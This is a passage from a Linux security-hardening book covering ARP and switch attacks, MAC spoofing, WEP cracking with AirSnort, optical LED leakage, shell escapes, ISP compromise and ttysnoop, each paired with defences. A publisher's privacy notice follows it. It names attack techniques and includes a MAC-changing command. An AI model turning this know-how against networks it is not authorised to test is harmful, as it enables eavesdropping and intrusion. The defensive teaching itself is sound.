All of the solutions in this section may be used together to best defend against switch hacking and other ARP (MAC) attacks. Good encryption techniques, such as those offered by SSH, SSL, and IPSec (FreeS/WAN), will prevent crackers from seeing or altering the confidential data that can travel over the network. Unfortunately, this is impractical for many protocols (e.g., HTTP, SMTP, and, in many environments, DNS). Worse, encryption offers no help for Denial of Service (DoS) attacks in which a cracker generates packets to reroute traffic intended for other systems to her system's MAC or to nonexistent addresses.

Many of the fancier switches allow the administrator to create a permanent database to map IP addresses to MAC addresses. Using this should prevent a cracker from overflowing the switch's database to force it to fail open and operate as a hub. It will not work, however, for sites using DHCP without static MAC to IP mappings. For a large site it may be too much work to build such a "hardwired" mapping in each switch even if the mappings are static.

Some switches offer a good compromise. The compromise is to allow the dynamic building of the mapping, but once a given MAC address is seen on a particular port, all subsequent data for that MAC will go there, making hijacking difficult. If a system is moved, the administrator will need to log into the switch and tweak its configuration, but this is a rare event.

However, about 50 percent of the NICs (Ethernet cards) made allow their MAC addresses to be changed under software control, allowing an attacker to defeat the nonchangeable MAC to IP mapping by using a new random MAC address. If the new packets get to the system running Arpwatch, they will be detected. One solution is to purchase only NICs that do not have this capability. A vendor should be able to tell you if its card can do this, though the capability also requires driver support. Certainly, this capability can be tested under Linux with the command

ifconfig eth0 hw ether 00:0A:0B:0C:0D:0E

Then do a ping to a second system, and on that system observe the new MAC address either with Arpwatch or with

arp -vna

NICs believed to support changing the MAC address this way under Linux are listed in Table 3.1. This list is not complete nor 100 percent accurate. Doing a search using the phrase set_mac_address for drivers not listed here will indicate cards supporting this capability. Their drivers under other operating systems probably support changing the MAC address too. On Macs, inspecting the Apple System Profiler may indicate this capability. Under Windows, viewing the Control Panel's Network and Dialup Connections item may suggest this.

The cards listed in Table 3.2 do not appear to support changing the MAC address under software control.

Another good solution is to segment the organization's network into different subnets separated by firewalls (or separated onto different interfaces of the same carefully designed firewall). A decently configured Linux firewall will not allow such MAC attacks to travel through it because it blocks packets with rogue IP addresses and thus prevents someone on one subnet from spoofing an IP that belongs on a different subnet.11 Linux also allows the MAC-to-IP mappings to be "hardwired" by the SysAdmin so that they will be permanent (until the next reboot). See "Intracompany Firewalls to Contain Fires" on page 84 and "Preventing ARP Cache Poisoning" on page 146 for details.

The solutions already discussed counteract switch poisoning, but they are not 100 percent effective nor do they warn you when your network is under attack. For these reasons, I strongly suggest that you also use an Intrusion Detection System to warn you of attacks and to help track down attackers.

3.4.19 Wireless Equivalent Privacy (WEP)

DANGER LEVEL

Wireless networking recently has begun to gain wider acceptance in the marketplace and, as a result, new security challenges have emerged. The term Wireless Equivalent Privacy was coined by the vendors' association to alleviate users' fears that their data broadcast over wireless networks would not remain private. However, I consider relying on WEP on a Wi-Fi wireless network to be accepting Wireless Equivalent Plundering of your data. WEP is a marketing name, not a technical description of the security level. It takes a national security agency or an elite private consultant to sniff what little data leaks off a conventional wired network.

However, sniffing unencrypted data from a wireless network that is using WEP requires nothing more than a Linux laptop with an ordinary Wi-Fi network card, a coffee can to form a directional antenna, and AirSnort running on the laptop for several hours. Will using WEP save you? The answer is no. A cracker looking for targets of opportunity need only drive around any large city with her AirSnort operational and aim the coffee can antenna at any building being passed.

This is known as Wardriving and is surprisingly effective. The subsequent cracking of discovered networks can be done from a parked vehicle, another company in the building, at a sales seminar to which the public has been invited, or at the coffee shop down the block. AirSnort needs to receive about 7 million encrypted packets. When it has received them, it takes but a second to recover the private keys so that two-way access to the network is obtained. Worse, recent articles appearing on major Linux Web sites and elsewhere confirm that the wireless networks at many large companies and other organizations do not even use WEP, allowing immediate stealth compromise and data injection.

But could all this be just the ranting of the paranoid? Has the author seen too much of the X-Files? The U.S. government's National Infrastructure Protection Center (NIPC) "serves as a national critical infrastructure threat assessment, warning, vulnerability, and law enforcement investigation and response entity." It had this to say:

Wireless networking offers great convenience for mobile users, although the technology's immaturity has led to serious security concerns that must be addressed.

NIPC gives more technical advice in its online document BEST PRACTICES FOR WIRELESS FIDELITY (802.11b) NETWORK VULNERABILITIES, currently available at www.nipc.gov/publications/nipcpub/bestpract.html. It points out that a wireless local area network (WLAN) is a radio station broadcasting the data and anyone nearby can intercept it. It notes that the effective transmission range can be from a few hundred feet to an entire campus. It reports that a group of experts have announced that it had defeated WEP in August of 2001, and that various hacker tools for exploitation are on public Web sites. It further notes the following.

Successful exploitation of the vulnerability [in WEP] has been simplified to getting within range to intercept the broadcast.

This NIPC page then quotes the recommendations of the Wireless Ethernet Compatibility Alliance (WECA); I have added my comments in italic.

  1. Turn WEP on and manage your WEP key by changing the default key and, subsequently, changing the WEP key,[sic] daily to weekly.

    So any key used for more than a day is at risk for being cracked?

  2. Password protect drives and folders.

    Can't WEP be trusted at all?

  3. Change the default SSID (Wireless Network Name).

    Default passwords are covered in "The Seven Most Deadly Sins" on page 27.

  4. Use session keys if available in your product.

    So a cracker can alter your data en route or inject his own?

  5. Use MAC address filtering if available in your product.

    It is trivial for a Hacker to use one of your MAC addresses after crashing its legitimate owner wirelessly and effortlessly.

  6. Use a VPN system...

For larger organizations, or where the value of the data justifies strong protection by a small business or home user, the WECA statement provides examples of additional security methods.

So, do not trust any data sent over Wi-Fi, even if protected by WEP, unless it is encrypted? Wow! If that does not scare your boss, show it to the organization's legal department.

Wireless Recommendation

Use wireless communications only with suitably strong encryption. This might be the use of SSH clients or VPN endpoints on the client systems. While you might consider unencrypted wireless communications safe for nonconfidential communications, I would consider the risk too great in downloading email that shows a competitor what your company's new product research areas are through browsing URLs, and so on. See "Protecting User Sessions with SSH" on page 409 and "Virtual Private Networks (VPNs)" on page 422.

If your management still does not believe how insecure WEP is, act as your own white hat (with written management permission). Download it yourself from

http://airsnort.shmoo.com

and prove it. In fact, this sniffing also should be done regularly to discover any unauthorized access points that employees may have installed for their own convenience. The convenience of this technology is far outweighed by the risks for many uses, unless suitably strong encryption—stronger than WEP—is used.

3.4.20 Hacking LEDs

DANGER LEVEL

The transmit and receive LEDs on virtually all modems broadcast the data being transmitted and received to all who can see them. In the paper "Information Leakage from Optical Emanations," by Joe Loughry of Lockheed Martin Space Systems and David A. Umphress of Auburn University, usable signals were received from 65 feet away using an inexpensive 4-inch telescope and phototransistor. A 1-foot telescope should work from 260 feet away. Because they use latching circuitry to make the lights more visible, no Ethernet switches had this vulnerability.

However, an enterprising cracker easily could modify one and send it to you as part of a "sales promotion" and wait for you to deploy it. He could also be more subtle and replace the optical LED with an infrared one or add the infrared one next to an existing one. The solution is the same one that dancers use to avoid suffering the painful Blues. Apply black electrical tape over the LEDs.

The same technique can be used to receive data from the LEDs on every PC keyboard. These can be made to flash under software control with the setleds command as a novel way for a cracker to get information out of your organization even if no unencrypted connection to the Internet exists. A program could send data through the LEDs at 150 bps. Using X may interfere with this command, but it worked on my firewall. Alternatively, by moving one wire within almost any keyboard case, one of the LEDs may be used to transmit every keystroke. A bogus "recall campaign" could be used.

Wireless keyboards and mice usually send the signal via an infrared LED that should be readable from quite a distance with an inexpensive telescope and phototransistor or from a sensor within the room. These signals are not encrypted. Laptops' and PDAs' LED upload/download ports can be attacked easily on airlines and other public places. The reflected glow of a CRT from any convenient object can be read at a distance in the same way. This technique for reading CRTs recently has been demonstrated by Professor Kuhn of Cambridge University.

3.4.21 Shell Escapes

DANGER LEVEL

If you are setting up accounts with restricted access, for example, no normal command shell, be sure that any commands that the account users use do not offer a shell escape. Such an escape can be used to circumvent whatever restrictions you intended. Steve Friedl's publicizing of a well-known company's failure to consider this escape capability in the more program and the subsequent major security problem created quite a stir. Some of the programs with shell escapes include Mail, cu, groff, ispell, less, more, telnet, tin, trn, and vi.

Shell escapes can be hard or impossible to disable without source code modification because many programs were not designed to suppress them. The Linux philosophy is to trust a user to do anything he wants to his own files. This should be considered a case of not using the program properly, rather than there being a bug in the program. Most of the programs were not designed to be used by users not trusted with their own files or world-accessible files. Some programs have a command-line argument to disable all escapes and some others might be fooled into disabling the shell escape in an ad hoc manner.

For example, the more program has both a direct shell escape using "!" and a subtle indirect one, an escape to vi, which itself has a shell escape. This indirect shell escape shows the danger of using this technique and the risks of using software differently from the way it was intended. Though more has no command-line arguments to turn these off, it does use environment variables to specify the shell to use and editor to use, $SHELL, $VISUAL, and $EDITOR.

Some other programs can be secured using this environment variable trick, but there is a large danger of overlooking something and causing a severe security hole. Many programs, with vi being a prime example, allow the user to specify an alternate file to work with from the user prompt, providing a security hole when used in the way discussed here. Many have found ingenious ways to subvert even the most hardened scripts.

This is a job for chroot. Place the nonroot user in a chroot "prison" with the files and directories owned by root, no world-write permission, and no set-UID programs. The user will not be "breaking out." See "Defeating the chroot() Vulnerability" on page 319 for some ways and defenses against them.

3.4.22 Your ISP

DANGER LEVEL

In a number of reports, crackers were unable to break into well-secured target sites. They got around this by breaking into the sites' ISPs first. The reports did not give details but we can take some guesses. A site's packets typically will be routed through the site's ISP, then through a backbone or two such as MCI or Sprint, the remote organization's ISP, and the remote organization's site. Besides the sites on either end, only their ISPs and the backbones are points of attack for packet sniffing.

Many people with personal ISP service or small business accounts will receive their e-mail at the ISP and download it via POP (Post Office Protocol) or IMAP. Certainly, this e-mail is stored at the ISP unencrypted. This allows a cracker who cracks the ISP to access, alter, or remove any e-mail. What can you do to ensure the safety of packets at your ISP? First, use the attack paths method, discussed in "Attack Paths" on page 23, to analyze your situation for vulnerability. Clearly, a major risk is e-mail stored at the ISP, because the cracker does not have to be "listening" at the time a packet transits the site. Instead, a periodic scan of the mailbox will do.

The best solution to the mail problem is to encrypt all e-mail with PGP and agree that the recipient will acknowledge receipt of all important e-mail. Although this is a great idea for those that your users regularly correspond with, it is impractical in the general case. A business cannot require all prospective customers to use PGP nor could it easily ascertain that the public keys were valid. For the general case, if you are concerned about security at your ISP, avoiding the ISP's POP servers is preferable. Instead, for those with continuous connections, try to get the ISP to allow port 25 (SMTP) to transit directly to your mail server; this will cause the mail to not remain on their system for any length of time. Some will not do this for noncommercial (home) accounts.

For these, a frequent invocation of the appropriate POP client is the solution, perhaps every 10–30 minutes. Certainly, if this is being done due to security concerns, a SSL-wrapped or SSH-wrapped protocol or equivalent should be used. It is assumed that your users are using SSH-wrapped or SSL-wrapped services wherever possible. A talented cracker will be able to intercept your e-mail before it gets to your mailbox on the ISP's system. PGP and the policy of acknowledging receipt of important e-mail (and expecting that acknowledgment) is the only antidote to this for e-mail.

Some Web merchants avoid the security and reliability problems of e-mail by offering a secure messaging system between their clients and themselves. It is wrapped in SSL to avoid sniffing or other interception or loss of messages. This is an excellent solution.

Besides e-mail attacks, all manner of sniffing and "Man-in-the-middle" attacks are possible. "Man-in-the-Middle Attack" on page 257 explains this attack and offers solutions, all of which involve secure encryption of data. In addition to these problems, often the ISP provides primary or secondary DNS service. This offers the cracker the opportunity to alter the DNS entries to point at their system or a third party's system. This will allow the cracker to forge your site, possibly getting customer data, but more likely, simply shutting down access to it.

There are various ways to check out how careful your ISP (or potential ISP) is about security. Certainly, the smaller your organization is and the larger your ISP is, the less they will be willing to take the time to talk about security. Small ISPs generally will have fewer resources to devote to security, though some really big ones do not seem to care; I'm not naming names.

Try doing some searches. I tried

Mindspring near (security or intrusion or breach)

on AltaVista's advanced search. When I did this for MindSpring (now EarthLink), my ISP, I found it listed as one of the principal clients for SecureWare's (now S1 Technologies') firewall product, along with one of the largest U.S. accounting firms and others in that arena. This is not surprising because MindSpring is a spin-off from SecureWare.

SecureWare's original claim to fame was converting UNIX to be a C2-level secure operating system for use by the U.S. government and its defense contractors, and they are very good. I consulted for them a number of times to enhance their secure UNIX kernel and do other security work. None of the other ISPs were using SecureWare's firewall, though they may be using other products.

Finally, go visit the ISP and ask for a tour. Ask to meet the technical people and ask them about security. If they are good, they will be eager to tell you about their security. Ask them about their "abuse" team. Scan the security lists and local Linux and UNIX groups and see if they participate. Decide if they are using an operating system that you consider secure. (EarthLink uses UNIX. Many use Linux. Some use NT.)

Many organizations allow special access from business associates. These may be partners, vendors, or large customers. Before granting this access, it is important that their security be evaluated. If it is weak, a cracker can break into your network through theirs. See also "SSH Dangers" on page 511.

3.4.23 Terminal Sniffing (ttysnoop)

DANGER LEVEL

The ttysnoop program is a powerful tool that may be used for both good and evil, depending on who is using it. It allows the person setting it up to snoop, or watch, all the data that flows to and from the specified ttys. It requires root privileges to install it and run it. It is useful to the SysAdmin who suspects that someone is up to no good by allowing the SysAdmin to monitor activities for improper actions and store all of them on disk. It can monitor any tty device including those used by virtual terminals and those that telnet uses.

Of course if a cracker installs it, she can see all your keystrokes, including your entering of your password. SSH is not a defense against such an attack on the client system as ttysnoop will intercept your data before it goes to SSH to be encrypted. The ttysnoop package includes good documentation and may be obtained from several sources including

ftp://contrib.redhat.com/pub/contrib/libc6/SRPMS/ttysnoop-0.12c-5.src.rpm
www.debian.org/Packages/unstable/admin/ttysnoop.html

3.4.24 Star Office

DANGER LEVEL

A friend reports that when his "tasks" failed he went troubleshooting. When he looked at the properties of the "tasks" icon on the desktop in the program invocation, his password was there in plain text. Because Star Office emulates Microsoft's Office products, it may emulate their security model too.

However, the Star Office folks are smart enough not to emulate Word's defaulting to enabling macros (as of Star Office 6.2). Unless changed, this protects Star Office users from macro viruses. Still, I recommend saving Word documents coming from the Internet to a file and viewing from a different "throwaway" account that has no important data or access to same.

3.4.25 VMware, Wine, DOSemu, and Friends

DANGER LEVEL

VMware is a commercial product that provides an emulation of PC hardware in order to run a guest operating system such as Windows on top of the native operating system. It needs to run as root as it must access hardware directly. There are the obvious issues that if hardware access is given to a guest operating system, that hardware is no more secure than that guest operating system. Additionally, there have been some security problems in VMware, reported in the security mailing lists. Those using this commercial product will want to check the archives and do a search using

http://google.com

or

http://altavista.com

DOSemu, short for DOS emulation, is just that. Most DOS programs will run on it as it emulates the video, system calls, and file system. There are similar issues with VMware's competitors, as well as Wine, DOSemu, and the like. Most of these offer some configuration options to improve security. Still, do not trust them to be any more secure than native Windows.

InformIT Promotional Mailings & Special Offers

I would like to receive exclusive offers and hear about products from InformIT and its family of brands. I can unsubscribe at any time.

Overview


Pearson Education, Inc., 221 River Street, Hoboken, New Jersey 07030, (Pearson) presents this site to provide information about products and services that can be purchased through this site.

This privacy notice provides an overview of our commitment to privacy and describes how we collect, protect, use and share personal information collected through this site. Please note that other Pearson websites and online products and services have their own separate privacy policies.

Collection and Use of Information


To conduct business and deliver products and services, Pearson collects and uses personal information in several ways in connection with this site, including:

Questions and Inquiries

For inquiries and questions, we collect the inquiry or question, together with name, contact details (email address, phone number and mailing address) and any other additional information voluntarily submitted to us through a Contact Us form or an email. We use this information to address the inquiry and respond to the question.

Online Store

For orders and purchases placed through our online store on this site, we collect order details, name, institution name and address (if applicable), email address, phone number, shipping and billing addresses, credit/debit card information, shipping options and any instructions. We use this information to complete transactions, fulfill orders, communicate with individuals placing orders or visiting the online store, and for related purposes.

Surveys

Pearson may offer opportunities to provide feedback or participate in surveys, including surveys evaluating Pearson products, services or sites. Participation is voluntary. Pearson collects information requested in the survey questions and uses the information to evaluate, support, maintain and improve products, services or sites, develop new products and services, conduct educational research and for other purposes specified in the survey.

Contests and Drawings

Occasionally, we may sponsor a contest or drawing. Participation is optional. Pearson collects name, contact information and other information specified on the entry form for the contest or drawing to conduct the contest or drawing. Pearson may collect additional personal information from the winners of a contest or drawing in order to award the prize and for tax reporting purposes, as required by law.

Newsletters

If you have elected to receive email newsletters or promotional mailings and special offers but want to unsubscribe, simply email information@informit.com.

Service Announcements

On rare occasions it is necessary to send out a strictly service related announcement. For instance, if our service is temporarily suspended for maintenance we might send users an email. Generally, users may not opt-out of these communications, though they can deactivate their account information. However, these communications are not promotional in nature.

Customer Service

We communicate with users on a regular basis to provide requested services and in regard to issues relating to their account we reply via email or phone in accordance with the users' wishes when a user submits their information through our Contact Us form.

Other Collection and Use of Information


Application and System Logs

Pearson automatically collects log data to help ensure the delivery, availability and security of this site. Log data may include technical information about how a user or visitor connected to this site, such as browser type, type of computer/device, operating system, internet service provider and IP address. We use this information for support purposes and to monitor the health of the site, identify problems, improve service, detect unauthorized access and fraudulent activity, prevent and respond to security incidents and appropriately scale computing resources.

Web Analytics

Pearson may use third party web trend analytical services, including Google Analytics, to collect visitor information, such as IP addresses, browser types, referring pages, pages visited and time spent on a particular site. While these analytical services collect and report information on an anonymous basis, they may use cookies to gather web trend information. The information gathered may enable Pearson (but not the third party web trend services) to link information with application and system log data. Pearson uses this information for system administration and to identify problems, improve service, detect unauthorized access and fraudulent activity, prevent and respond to security incidents, appropriately scale computing resources and otherwise support and deliver this site and its services.

Cookies and Related Technologies

This site uses cookies and similar technologies to personalize content, measure traffic patterns, control security, track use and access of information on this site, and provide interest-based messages and advertising. Users can manage and block the use of cookies through their browser. Disabling or blocking certain cookies may limit the functionality of this site.

Do Not Track

This site currently does not respond to Do Not Track signals.

Security


Pearson uses appropriate physical, administrative and technical security measures to protect personal information from unauthorized access, use and disclosure.

Children


This site is not directed to children under the age of 13.

Marketing


Pearson may send or direct marketing communications to users, provided that

  • Pearson will not use personal information collected or processed as a K-12 school service provider for the purpose of directed or targeted advertising.
  • Such marketing is consistent with applicable law and Pearson's legal obligations.
  • Pearson will not knowingly direct or send marketing communications to an individual who has expressed a preference not to receive marketing.
  • Where required by applicable law, express or implied consent to marketing exists and has not been withdrawn.

Pearson may provide personal information to a third party service provider on a restricted basis to provide marketing solely on behalf of Pearson or an affiliate or customer for whom Pearson is a service provider. Marketing preferences may be changed at any time.

Correcting/Updating Personal Information


If a user's personally identifiable information changes (such as your postal address or email address), we provide a way to correct or update that user's personal data provided to us. This can be done on the Account page. If a user no longer desires our service and desires to delete his or her account, please contact us at customer-service@informit.com and we will process the deletion of a user's account.

Choice/Opt-out


Users can always make an informed choice as to whether they should proceed with certain services offered by InformIT. If you choose to remove yourself from our mailing list(s) simply visit the following page and uncheck any communication you no longer want to receive: www.informit.com/u.aspx.

Sale of Personal Information


Pearson does not rent or sell personal information in exchange for any payment of money.

While Pearson does not sell personal information, as defined in Nevada law, Nevada residents may email a request for no sale of their personal information to NevadaDesignatedRequest@pearson.com.

Supplemental Privacy Statement for California Residents


California residents should read our Supplemental privacy statement for California residents in conjunction with this Privacy Notice. The Supplemental privacy statement for California residents explains Pearson's commitment to comply with California law and applies to personal information of California residents collected in connection with this site and the Services.

Sharing and Disclosure


Pearson may disclose personal information, as follows:

  • As required by law.
  • With the consent of the individual (or their parent, if the individual is a minor)
  • In response to a subpoena, court order or legal process, to the extent permitted or required by law
  • To protect the security and safety of individuals, data, assets and systems, consistent with applicable law
  • In connection the sale, joint venture or other transfer of some or all of its company or assets, subject to the provisions of this Privacy Notice
  • To investigate or address actual or suspected fraud or other illegal activities
  • To exercise its legal rights, including enforcement of the Terms of Use for this site or another contract
  • To affiliated Pearson companies and other companies and organizations who perform work for Pearson and are obligated to protect the privacy of personal information consistent with this Privacy Notice
  • To a school, organization, company or government agency, where Pearson collects or processes the personal information in a school setting or on behalf of such organization, company or government agency.

Links


This web site contains links to other sites. Please be aware that we are not responsible for the privacy practices of such other sites. We encourage our users to be aware when they leave our site and to read the privacy statements of each and every web site that collects Personal Information. This privacy statement applies solely to information collected by this web site.

Requests and Contact


Please contact us about this Privacy Notice or if you have any requests or questions relating to the privacy of your personal information.

Changes to this Privacy Notice


We may revise this Privacy Notice through an updated posting. We will identify the effective date of the revision in the posting. Often, updates are made to provide greater clarity or to comply with changes in regulatory requirements. If the updates involve material changes to the collection, protection, use or disclosure of Personal Information, Pearson will provide notice of the change through a conspicuous notice on this site or other appropriate way. Continued use of the site after the effective date of a posted revision evidences acceptance. Please contact us if you have questions or concerns about the Privacy Notice or any objection to any revisions.

Last Update: November 17, 2020